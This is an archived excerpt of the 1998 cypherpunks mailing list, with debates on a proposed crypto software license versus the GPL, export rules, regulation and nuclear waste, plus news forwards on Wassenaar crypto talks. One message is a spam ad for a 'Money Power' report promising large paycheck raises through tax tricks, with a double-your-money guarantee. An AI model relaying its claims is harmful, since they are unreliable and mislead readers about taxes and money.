Message-ID: <199810010100.DAA26700@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: propose: `cypherpunks license' (and vague ideas for additions)

> I don't want government back doors in any software I use, but this
> kind of restriction is the wrong way to avoid them. The right way is
> through the GNU GPL,

You just pegged my bogometer.

The GNU GPL discourages the sale of proprietary software by prohibiting
anything using code covered by the license from being proprietary, and
that's right.

The proposed Cypherpunks license discourages the distribution of software
with key recovery (= government back doors) by prohibiting anything using
code covered by the license from having key recovery, and that's wrong.

Both these licenses would be trying to promote their propagators' goals
through restrictions on code re-use. However, Cypherpunks and GNU types
don't have exactly the same goals. GNU types consider the availability of
good, non-proprietary software to be paramount, whereas Cypherpunks
generally consider the use of good cryptography in useful applications to
be paramount, whether the code behind it is free or expensive, open-source
or proprietary (although proprietary code often ends up being bad crypto).
Companies will not put good crypto in useful applications if it
necessitates that they all but give up whatever intellectual property
rights they had to other parts -- even non-crypto-related parts -- of the
application, so the GPL is clearly not the best license for to promote
Cypherpunk goals.

On a different tangent, lemme suggest some vague ideas for a few potential
requirements:

Warnings about proprietary code: Authors of products using CPL-covered
code which do not release all source code must either a> clearly
demonstrate that none of the unreleased code can have a negative impact on
security or b> place a message on any marketing materials or documentation
mentioning the product's security features saying "For important warnings
about this product's security, see <url>."

CPL advert: Authors of products using CPL-covered code are required to
include with their copyright information some message like "This product
uses code covered by the Cypherpunk License for its security features. See
<url> for more information." and are requested to include references to
the site in other convenient places. This site, of course, need not be
limited to dry legalese about the license, but may include vivid
descriptions of driftnet wiretaps and other mischief perpetrated by NSA
and friends, cryptopolitical rants, or even tools for building and setting
up various cryptostuff. Note the "may;" lots of stuff requires lots of
work, and so, unless there was sort of backing from a civil-liberties
organization with staff-hours to spare or some miraculous effort of
miracle of organization...how's that secure talk client going?

Strength requirements: By default and taking into account only the
published attacks on the cryptographic primitives used, an average of at
least 2^79 operations must be required for anybody (law-enforcement or
not) to compromise the product's security features. If and only if laws
restrict this software's use or sale, a second version may be created with
lower strength, and the stronger version may operate at lower strength
when necessary for smooth interoperation, provided that the user knows
before sending any information that the connection uses weakened
encryption. The weaker version must be clearly marked as such (i.e.,
"Widget 2.4 Export" vs. "Widget 2.4").

Fact sheet: Authors of products using CPL-covered code are requested but
not required to create a sort of security fact sheet detailing the
technical aspects of the product's security features --

* algorithms and key lengths 
* a precise description of the breadth of the security features
* a description of the threat model used in the design process

-- and issues relating to trust in the product --

* authors of algorithms and code, if available
* the level of openness of the source 
* places to obtain whatever source was released 
* information on any independent analyses of the product's security 
* information on independent verifications of the fact sheet

-- followed by a summary placing this in more practical contexts. I'd
imagine any license including this would also include a form form the fact
sheets and some places to send them.

> which would enable people to check the source code of a modified
> version for anything suspicious.

Note that I'm only on one of the lists; Cc: replies to <nobody@replay.com>. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@cryptsoft.com>
Date: Wed, 30 Sep 1998 12:45:14 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809301621.KAA09089@wijiji.santafe.edu>
Message-ID: <Pine.GSO.3.96.981001033005.6808G-100000@pandora.cryptsoft.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 30 Sep 1998, Richard Stallman wrote:
> It isn't surprising that people who want to write non-free software
> are disappointed that the GNU project won't help them.  What is
> amazing is that they feel this is unfair.  They have no intention of
> letting me use their source code in my programs--so why should they be
> entitled to use my source code in their programs?  These people seem
> to think that their selfishness entitles them to special treatment.

:-) I always find this amusing myself.  If people have written code, they are,
by virtue of the fact they have actually done the work, able to enforce their
particular views on the world via their licence, be it a GNU, BSD, Netscape or
other form.  The problem sometimes occurs when people put their code out under
a licence they do not fully understand, and does not capture their intent.
I personally have a policy that if I ever change the licence conditions in any
of my code, the last version with the old licence will always be available for
those who don't like the new licence.  This way if my opinions on how the
software can be used changes, people don't have to suffer through my
'conversion to a new faith' :-).  The will only have access to the old stuff
under the licence they like.
 
> The GPL is my way of offering a certain kind of cooperation to anyone
> else who is willing to cooperate in the same way.

And the problem that some of us have with the GPL, in that it does take a
rather strong stance on this issue, making it incompatable with other people
who are not that passionate.

eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 30 Sep 1998 22:03:09 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810010255.EAA05178@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Why, if the ignition-controllers of cars are 
CPUs, aren't cars theftproof without a 
crypto-token?



David Honig
Irvine Design Teleoffice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 1 Oct 1998 05:47:22 +0800
To: warlord@MIT.EDU>
Subject: RE: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8468@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



My computer alleges that  Derek Atkins[SMTP:warlord@MIT.EDU] wrote:


> The big issue I see with GPL and Crypto software is that with the
>  GPL you cannot add any redistribution restrictions.  The problem 
> is that due to the United States export rules, I cannot export 
> Crypto software, which means I must legally put a restriction on 
> any Crypto code I write.  But, this is a "further restriction" as far
> as the GPL is concerned.  This, in turn, means I cannot use the 
> GPL for Crypto software.

Surely the way round this is to take the "batteries not included" route?
Just use GPLed libraries or standalone modules. Or write your code in such a
way that some modules are GPLed and some aren't. Sell your modules & tell
people that they will need to get the GPL stuff through "normal channels".  

Of course, once outside the USA you are safe. Nobody *outside* the US cares
much about your export restrictions or absurd ideas about patenting software
anyway - although in many European countries, and certainly in UK, we take
copyright a lot *more* seriously than you. Copyright is widely seen as a
right, something that naturally belongs to the author or artist. In French
law they even talk about right of "paternity" in a text (part of "Droit
Moral")  even if you assign copyright to another person you are still
allowed to veto changes in it, your right is seen as inalienable, like  the
rights you have to your own person - copyright is part of personality, not
property. (This has been partly imported into English law as a a right to be
identified as the author, which has to be asserted, which you now nearly
always do). In France but not in England they also recognise the right to
withdraw a work  (although for some reason Stanley Kubrick seems to have
been able to withdraw the Clockwork Orange film in England, I don't
understand how) and the right of access to a work (an artist is allowed
access to a painting which has been sold to someone else). These things are
seen as part of personality. Just as in the US the law won't allow you to
sell yourself permanently to someone else (i.e. no slavery, even voluntary
slavery) but only rent yourself out  (employment) so in most of Europe you
can't really "sell" copyright, only rent it out.  But patents are to some
extent seen as government interference, as licensed monopoly. They tend to
be unpopular with everyone (except lawyers, inventors and pharmecutical
companies of course).

I suspect there are a lot of people who would have moral problems with
breaking someone else's software copyright but wouldn't give a dam about
breaking a software patent. An algorithm is an idea, and how can anyone own
an idea? (I'm talking morals here, not law - intersecting universes of
discourse, but not identical ones :-)

Ken Brown (and not his employers who respect patents greatly and would sack
me if I broke them at work. After all they own an awful lot of them...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 07:47:27 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810011234.HAA17960@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Thu, 1 Oct 1998 00:30:14 -0700 

> And you would be stupid to expose yourself to full liability.

No, being a single proprietorship isn't stupid. It may not be something you
like but it isn't stupid. I will agree that depending on the size and type
of business it isn't always the best way, but then being a multi-national
incorporation isn't the best way to do local contract work for SOHO's (for
example) either.

> Regulation includes much more than licensing and registration. Try
> hiring a couple employees,

As long as it's only two I don't have to worry about federal regulations and
such, they only kick in when I hire 3 or more.

> paying freelance individuals,

Hand them their 1099's and they're out the door. I just pay them whatever I
agreed (gross before taxes) and the 1099 is *their* promise to deal with the
taxes.

> setup office space,

Sign a lease and wallah.

> get yourself a company car

All I need for that is a DBA, can even open bank accounts and get credit
cards in the company name with nothing but a DL and that DBA.

> and do your fed income taxes.

As a single proprietorship I do my taxes the same old way I always did them
except I must include the SE documents which only add a few pages. If I do
the contract work via 1099's (which says that the contractor is responsbile
for the taxes on that income) all I have to show is the gross amount paid to
that contract person.

> If they enforced every word of every code strongly and
> literally it would be nearly impossible to conduct business.

No, it wouldn't. For example I do contract work for small office - home
office companies (generaly 10 or less employees total). I write software,
install software, train, repair hardware, do upgrades, etc. and there are
literaly NO regulations at any level on those activities outside those
imposed by 1099's for sub-contractors (who work their own hours and must
provide their own tools) and the contract I and the customer agree to.
If I buy something for a customer I pass the receipt along to them and get
reimbursed for my time (on a seperate receipt) and the exact amount for the
items purchased (I am acting as their agent and not a reseller) so I don't
even need a tax number technicaly (since I don't pay state sales tax on
labor costs and am not selling them the items purchased). All I need is a
$15 DBA and a bunch of blank 1099's.

Why do cities and states require licenses on such things as air conditioning
or auto mechanics? Because for years there were no licenses required and
anybody could do it. After enough decades of scam artists, poorly run
business who cost customers money because they went out of business without
doing the work, or they did sub-standard (as defined by the practitioners of
that activity) work.

I challenge you to find an example where a state or federal regulation was
imposed before the industry matured.

> Bullshit, monopolies exist because of the regulation.

No, monopolies exist because people are greedy and want to own everything.
History is full of examples where industries were unregulated (ever read
Upton Sinclair?) and abused the employees and the market and as a result
regulation was imposed. It's interesting that free-market mavens never seem
to mention that the vast majority of monopoly examples occured *before*
industry regulation was imposed.

Even in the Microsoft case, it's only now that they've grown so big and
become so porous about information that the government has stepped in and
begun asking "has the industry matured to the point where continued
non-regulation is a detriment because it allows hording of industry
resources?"

Even if we were to de-regulate the clothing industry for example it is
highly unlikely that child labor and sweat shops would become less
prevalent. Of course I'd like to see your evidence to the contrary.

"Those who don't understand history are doomed to repeat it"

                                       Santyana

> Bullshit again, there is a *big* difference between a regulated market
> (mixed capitalist/socialist economy) and a command economy. So because
> we don't live in Soviet Russia we should all bend over and take it?

A regulated market is something that has regulation imposed from the
outside (ie besides the supplier and consumer). There are certainly
different kinds of regulated economies just like there are different kinds
of mammals. But to say that Zebra's aren't mammals because they don't look
like an Aardvark is a dis-serivice.

You, and every other free-market maven, have yet to demonstrate with
historical example that free-market works.

> Coercive power takes form via regulation. Without it a bad monopoly is a
> short-lived one.

Tell that to the rail-roads of the mid to late 1800's, the meat packing
industry of the late 1800's and early 1900's. The sweat houses of the
garment industry since the early 1800's, etc.

No sir, history doesn't support your proposition at all.

> Liability, liability, liability. Regulation often promotes bad practice
> as businesses comply with minimum regulation and nothing more instead of
> thinking for themselves. What is worse is government often shields
> companies from liability.

See above examples. Hell, take a look at the wet pet food market now for a
perfect example of why non-regulation is a bad thing and why liability and
other such buzz words don't work in the real world. And you were wondering
why your little toodles was loosing her hair, was always excited and
aggitated and has the health of a pet 3-4 years older than the chronological
age...

Bottem line, in a free market (no regulation other than consumer and
supplier) there are no controlling mechanisms and no recourse for the
consumer because they have nothing to demonstrate even an implied warranty
or liability of manufacturer (read software licenses to see how this can be
side stepped easily, hint: imagine a software license on the side of a can
of beans.).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 07:41:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810011237.HAA18025@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Wed, 30 Sep 1998 23:49:10 -0700

> > No Netscape on NT or 95/98 is no where near as stable as 
> > on a Linux or Solaris box (the two that I use most).
> 
> Correct me if I am wrong or if this has changed since they went
> open-source, but AFAIK Mozilla's Windows and Unix codebases were
> entirely independent and separately developed, so I'm not sure what
> conclusions you can draw from that.

I'd say the obvious one, the Unix code tree is more stable than the MS tree.

> Again, let's leave the OS wars off this list. I've had NT machines up
> for several months and down only for patches and upgrades.

As I have, but at nowhere near the load level that Unixes can support.
To get even near-mark performance requires larger hard drives, faster
processors, and way more ram (2x or more in many cases).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 2001files@usa.net
Date: Thu, 1 Oct 1998 09:41:16 +0800
To: cypherpunks@cyberpass.net
Subject: Greatest  MONEY Secret in  America
Message-ID: <199810011441.HAA27533@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



Would you like to get a pay raise next week without asking your boss?   Then this very special report, "Money Power," is for you!

If you have a regular job - not working in your own or a family business - and you get a regular paycheck, we can show you how you can give yourself a HUGE RAISE in your very next paycheck.  At least between 20% - 30% more than what you are getting now.  Yes, your paycheck will be increased substantially!

	* Example:  If your take home pay is $400 net per week, you can take home $440 - $500 the very next week and every week thereafter!

No Gimmicks!  Everything is perfectly legal.

"Money Power" is written in three parts:

	*Part I - shows you exactly what to do so you can give yourself a raise in your next paycheck.  You decide how big a pay raise you want to give yourself!

	*Part II -  shows you how to protect yourself, your family, your home, and your assets without paying big money -- just $85 per year to legally protect your liability 100% against bill collectors and debts.

	*Part III - shows you how you can legally deduct household expenses - utilities, gardener, supplies, repairs, and more from your income taxes.  Absolutely No Gimmicks!  Everything is legal.

This is NOT a "get rich quick" scheme or some other scam.  We are sure you have seen lots of them.  And this is NOT a "tax protester" who refuses to pay income taxes.  The author of this report pays taxes every year - of course, as little as legally possible.  It's our opinion it is not good to zero out completely.  But, you can - it's your choice.

Using the methods in this report, the rich become richer.  And poor people become poorer when they don't take advantage of these techniques.  Your chances of being audited by the IRS - just for using these methods - are near zero.

	* We are so sure "Money Power" will work for you, here is our risk-free guarantee.  If you don't get at least 100 times more money in your paycheck in one year than the cost of this report, we will double your money back!  How's that for a guarantee?
                      ---------------------------------

Now, here's one more offer you will find hard to refuse.  We have a Reseller Program whereby you can make money selling this report.  When you purchase "Money Power," you will also get 1,000 FREE places to advertise on the Internet!  If you want to make some extra money - $500, $1,000 or more - just post ads on those sites and have the orders come to you.  For every order you send us, we will pay you $5.00:
	*You don't need a merchant account to process orders!  We do that.
	*You don't have to warehouse any inventory!  We do that.
	*You don't have to ship any merchandise.  We do that.
All you have to do is send us the orders.  We'll process checks, money orders, and credit cards and we will pack and mail the report.  And you get paid twice a month - on the 15th and the 30th!
                     ------------------------------------



And, listen.  America is a free country.  If you don't want an increase in your paycheck, that's fine.  And if you don't want to know how to protect your family, that's OK, too.  And if you don't want to save money on taxes, that's quite all right.  You are living in a free country.

But, if you need money - more money in your paycheck, act right now!  

The author of this report used to work for Corporate America earning over $100,000 a year.  After paying almost 40% in Federal taxes, 6.2% for Social Security, 1.45% for Medicare, 1.5% for the unemployment fund, and 3% for his employee benefits, he would bring home less than half of his yearly salary!  And then there was state income tax to pay!   He decided he had to do something so he could keep all the money!

"Money Power" is the result of the author's frustration and aggravation with the system and the research he did to change his situation.  These are methods they don't teach you in school!

It can't get much better than this.  This is a once in a lifetime opportunity because you may not receive this message again.  And you know how it is with opportunities ..... if you pass on one, you are not entitled to another for a long time.


Don't Delay!  The longer you wait to order, the longer you will wait for your raise!!!!


	>>>>>>>>>>>>> Please Note:  This report is for U.S. Citizens and Green Card holders only!  This program will not work for illegal immigrants or foreigners.<<<<<<<<<<<<

---------------------------------------------------------------------------

Here's how to order:

*****To order online, click on your reply button and type ORDER ONLINE in the subject line and we will e-mail you the online order form.

                             OR

Print out the convenient order form below NOW and mail it to:

	World Net Press
	Dept. E-927
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
Payment Method:  
_____ Check     
_____ Money Order
_____ Visa
_____ MasterCard
_____ American Express
_____ Discover

_____ Yes, I want to order my copy of  "Money Power".  Price is $9.95 + $3.95 S/H = $13.90 and my order will be shipped by 1st Class Mail.   

Name_________________________________________________________________________

Address______________________________________________________________________

City/State/Zip_______________________________________________________________

Daytime Phone (__________)___________________________________________________

E-Mail Address_______________________________________________________________

Credit Card #_____________________________________________ Exp. Date_________

Cardholder Name (as it appears on the card)__________________________________

(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)



**************************************************************************
We are currently consolidating our mailing lists and need to update our database.  Our records indicate you may have inquired in the past. If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.

Please click on your reply button and type REMOVE in the subject line only.  The software reads only the subject line, not the body of the message.
**************************************************************************

Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 07:41:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: I thought of an initialy regulated industry!...
Message-ID: <199810011243.HAA18113@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

In regards the discussion about regulation and industry. I can think of only
one industry that was regulated before the very first company opened their
doors for business....nuclear power plants.

Personaly, 3 Mile Island in a un-regulated industry scares the hell out of
me...and I support nuclear power. Look at the fiasco of Chernobyl in a
control market.

I'd like to hear from any free market mavens who might want to use the
nuclear industry as an example of how things could be so much better with no
regulation regarding construction, operation, or waste disposal.

"Hey Sammy, just through those spent pellets in with the trash, those stupid
trash people don't know nothing...."


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 09:13:09 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: crypto on /.
Message-ID: <199810011413.JAA18337@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://slashdot.org/

>    Senate considering Tax-Free Net Bill The Almighty Buck Posted by Hemos
>    on Thursday October 01, @08:48AM
>    from the bloody-well-approve-it dept.
>    Well, although the House of Representations passed it way back in
>    June, the US Senate is finally getting close to passing the bill which
>    would temporarily close the Internet to any new taxes. It will be
>    considered today. It has been twice blocked by Senator Bob Graham
>    (D-Florida), but Senator McCain (R-Arizona) has pushed it forward.

>    Ask Slashdot: Cryptography and Digital Signatures Encryption Posted by
>    Cliff on Wednesday September 30, @09:40PM
>    from the encryption-101 dept.
>    Jonathan Squire writes in with questions concerning encryption. He
>    writes: '...is it considered "secure" to generate an MD5 of a
>    passphrase and then use the MD5 hash as the key to an RC4 cypher of a
>    message/file that you want to send to someone? What are the
>    implications of sending some alternative file with the same pass
>    phrase used if someone who does not know the pass phrase is able to
>    obtain both of the cyphertexts? What if they obtain both cyphertexts
>    and one clear text, how hard would it be (computationaly/finacially)
>    for them to derive the passphrase that was used?'   There's more!
>    Click the link below...

>    Investigating Echelon Encryption Posted by Hemos on Wednesday
>    September 30, @02:29PM
>    from the white-or-black-spy dept.
>    It appears that the European Parliment is going to attempt to
>    investigae Echelon, the somewhat mystical eavesdropping entity that is
>    supposed to be able to listen to all Continental communications. This
>    article gives a great amount of detail about what it is alleged to
>    be, but apparently it's run by five security agencies, including the
>    NSA, and can intercept almost anything. I'd love to have this rig at
>    home. updated


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Thu, 1 Oct 1998 04:28:40 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <36134ACF.A09E1263@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Richard Stallman wrote:
> It isn't surprising that people who want to write non-free software
> are disappointed that the GNU project won't help them.  What is
> amazing is that they feel this is unfair.  They have no intention of
> letting me use their source code in my programs--so why should they be
> entitled to use my source code in their programs?  These people seem
> to think that their selfishness entitles them to special treatment.

a) Who ever said this was unfair?

b) Several of the people who are complaining are about the GPL are not
people who want to use GPLed software, but people who want to release
their software under a free licence and think GPL isn't the right one.

c) In my experience GPL stops many companies from even considering using
code. A less restrictive licence gets it through the door, and they
later come to understand the benefit of freeing the source, even though
they are not obliged to. OK, so sometimes we lose under this scheme, but
sometimes we gain. 

d) As far as I can work out, someone who wants to free part of a
product, but not all of it, can't practically do so under GPL.

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 1 Oct 1998 12:45:59 +0800
To: cypherpunks@Algebra.COM
Subject: Re: I thought of an initialy regulated industry!...
In-Reply-To: <199810011243.HAA18113@einstein.ssz.com>
Message-ID: <v03130300b2396d276094@[209.133.20.6]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:43 AM -0700 10/1/98, Jim Choate wrote:
>Hi,
>
>In regards the discussion about regulation and industry. I can think of only
>one industry that was regulated before the very first company opened their
>doors for business....nuclear power plants.
>
>Personaly, 3 Mile Island in a un-regulated industry scares the hell out of
>me...and I support nuclear power. Look at the fiasco of Chernobyl in a
>control market.
>
>I'd like to hear from any free market mavens who might want to use the
>nuclear industry as an example of how things could be so much better with no
>regulation regarding construction, operation, or waste disposal.

"Regulation" of the nuclear power industry had the predicted effect of
overly conservative designs being standardized. Specifically, the
Westinghouse boiling water designs, basically frozen in 1955 and little
changed since then.

Ordinary evolutionary improvement, plus revolutionary improvement, has not
been possible. (Some examples would include inherently fail-safe designs
like the Canadian CANDU reactor, and various improvements the French have
made in the original Westinghouse design.)

Waste disposal is even more of an example of a government-worsened problem.
If politicians were not grandstanding about the dangers of nuclear waste
and monkeywrenching plans, we'd have waste disposal sites.

(For example, there is no plausible evidence that storing waste in caverns
in dry desert areas in Nevada, California, New Mexico, etc. is dangerous.
And certainly better in all regards than storing waste in drums sitting in
places like Hanford, Washington, near the Columbia River. Etc.)

Personally, I favor the "Pournelle Solution": acquire a 10-mile by 10-mile
region of the Mojave Desert. Not in an "ecologically interesting" area of
Death Valley, but just out in the vast scrublands. Erect a double fence
around it, and perhaps even a minefield (if one is worried about thefts of
nuclear waste). Pile the spent fuel rods, medical gear, gloves, etc. on
pallets separated  by wide roads from other pallets. This "solves" the
waste problem for at least a matter of many decades, by which time various
technologies will likely have presented other and better solutions. Cost is
low, convenience is high, safety is good, environmental polllution is nil.

Finally, the "environmental burden" imposed by a coal-fired power plant is
vastly greater than that from a nuclear plant. Do the math on particulates,
carbon levels, etc. Many libertarians have proposed better schemes for
dealing with such environmental burdens....if fossil fuel-powered plants
had to actually pay their share of environmental costs, they'd be even more
expensive than nuclear.

Face it, nuclear has failed in the U.S. because of yahoos who think their
children will be mutated or something along those lines. (I dealt with
these yahoos at Intel when my lab was using a lot of radioactive sources.)

Cypherpunks is not the place to debate nuclear power, but I had to answer
these claims.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 1 Oct 1998 04:53:17 +0800
To: cypherpunks@toad.com
Subject: Why is the world not perfect?
Message-ID: <199810010850.KAA00389@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> Why, if the ignition-controllers of cars are
> CPUs, aren't cars theftproof without a
> crypto-token?

The bastards (a term which collectively includes insurance companies,
police, car manufacturers and a host of others) make vast amounts of
money on the basis that your car is stolen regularly.

Scheduled Disasters are good for business. Whoever it was who had the
idea for a Y2K bug is currently minting it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 1 Oct 1998 12:51:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [RRE]Conference: Technological Visions
In-Reply-To: <v0401173fb2396565a4b9@[139.167.130.248]>
Message-ID: <v03130301b23970a63411@[209.66.100.43]>
MIME-Version: 1.0
Content-Type: text/plain




>The Problems and Potentials of Prediction
>Privacy and Censorship
>Communities of Place and Cyberspace
>Media Discourse on New Technology
>Technological Visions
>
>Confirmed Participants:
>
>John Perry Barlow, Lord Asa Briggs, Richard Chabran, Bob Cringely,
>Wendy Grossman, Katie Hafner, Larry Irving, Peter Lyman, Carolyn
>Marvin, David Nye, Mitchel Resnick, Romelia Salinas, Vivian
>Sobchack, Lynn Spigel, Sherry Turkle, Langdon Winner, Philip
>Zimmermann

Mostly journalists and scribblers. Typical. Journalists yakking with other
journalists on the same boring panels.

As with the 24/7 coverage of the Lewinsky matter on CNN, MSNBC, CNBC, Fox,
and other networks, it is mostly journalists pontificating with other
journalists.

Oddly, though, this one is not in the usual place, Washington, D.C.

--Tim May



Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 10:45:47 +0800
To: cypherpunks@cyberpass.net
Subject: early reports from Austria: possible crypto stalemate (fwd)
Message-ID: <v04011730b2394d3ff640@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Thu, 1 Oct 1998 03:04:38 -0300 (ADT)
From: M Taylor <mctaylor@privacy.nb.ca>
To: cryptography@c2.net
Subject: early reports from Austria: possible crypto stalemate (fwd)
MIME-Version: 1.0
Sender: owner-cryptography@c2.net


---------- Forwarded message ----------
Sender: efc-talk-owner@insight.cas.mcmaster.ca
Subject: early reports from Austria: possible crypto stalemate
Date: Wed, 30 Sep 1998 17:48:20 -0400 (EDT)
To: efc-talk@insight.cas.mcmaster.ca
From: David Jones <djones@insight.cas.mcmaster.ca>

Brief Crypto update:

Sources in Vienna, Austria, where the current Wassenaar negotiations
have been taking place, seem to indicate that there have been no
changes on international crypto policy.  This is generally regarded
as a "good sign", since it means the hard liners (Russia, US, France, UK, NZ)
haven't been successful, and those countries advocating a more liberal
policy may be sticking to their positions.

The next time int'l crypto policy is to be formally negotiated
is apparently early in December.

-- djones@efc.ca


P.S. If anyone happens to be fluent in German, maybe you could help us
     by translating, or summarizing, in English:

	http://www.mediaweb.at/akmg/news/wassenaar.html

----------------

(via babelfish)
http://babelfish.altavista.digital.com/cgi-bin/translate?urltext=http%3A%2F%2Fww
w.mediaweb.at%2Fakmg%2Fnews%2Fwassenaar.html&lp=de_en

In my very brief summary: it appears that a stalemate was reached in
regards to the public domain exemption ("General Software Note" in Canada)
of cryptography. The heavyweights (US, UK, France, Russia) want to remove
it while others (much of Europe?, Canada?) want to preserve it.

There is also mention of key-escrow, but I'm not certain if that is tied
to the Wassenaar Agreement talks.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 10:49:36 +0800
To: cypherpunks@cyberpass.net
Subject: Oct 2 column - take them shooting
Message-ID: <v04011735b23950b0c54e@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 1 Oct 1998 00:29:27 -0600
